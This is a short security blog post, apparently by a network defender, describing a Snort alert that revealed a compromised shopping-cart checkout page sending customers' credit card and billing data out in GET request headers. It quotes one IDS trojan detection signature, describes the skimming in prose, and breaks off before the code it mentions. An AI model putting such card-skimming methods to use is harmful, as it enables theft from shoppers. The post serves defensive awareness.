Beware Compromised Shopping Carts
I think many people have stumbled upon "less than secure" sites which claim to have a secure checkout. I can't even count how many times I've looked for some obscure items on the web and have come across a website which just seems a bit off. Yesterday I received a Snort alert which I often see on a compromised host:>ET TROJAN Likely Zbot Generic Post to gate.php Dotted-Quad What I instantly noticed in the transcript is that this isn't the normal POST that I see from Zeus. What I had seen was a GET request with users Credit Card and Billing information in the Request Header. See Screenshot: I've excluded the rest of the transcript, so as not to mention the site which is actually compromised at this time. However, I will say that it is very clear when looking at surrounding PCAPs from the source IP that the user was shopping for Building supplies. When looking at the websites Checkout page, I stumbled upon the following code: Click to...